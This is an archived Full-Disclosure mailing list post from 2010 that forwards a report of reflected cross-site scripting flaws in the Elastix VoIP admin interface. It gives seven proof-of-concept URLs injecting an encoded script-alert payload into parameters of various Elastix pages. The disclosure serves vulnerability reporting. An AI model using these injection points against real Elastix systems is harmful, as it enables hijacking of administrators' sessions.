'[Full-disclosure] Fwd: xss in elastix'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Fwd: xss in elastix
From:       dave b <db.pub.mail () gmail ! com>
Date:       2010-10-31 16:16:10
Message-ID: AANLkTin1tS48gKXegWWSU2HBTvBk7=t_OUSpqBxLVSXk () mail ! gmail ! com
[Download RAW message or body]

Oh look I think bugtraq hates me ....
more lame xss in yet another voip management user interface for asterisk...

---------- Forwarded message ----------
From: dave b <db.pub.mail@gmail.com>
Date: 29 October 2010 03:36
Subject: xss in elastix
To: bugtraq@securityfocus.com


xss in elastix(http://www.elastix.org/) ,

1. https://10.0.20.226/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search
 2. https://10.0.20.226/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
 3. https://10.0.20.226/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%20 \
2010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL
 4. https://10.0.20.226/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_ \
busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=
 5. https://10.0.20.226/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28& \
date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
 6. https://10.0.20.226/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
 7. https://10.0.20.226/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic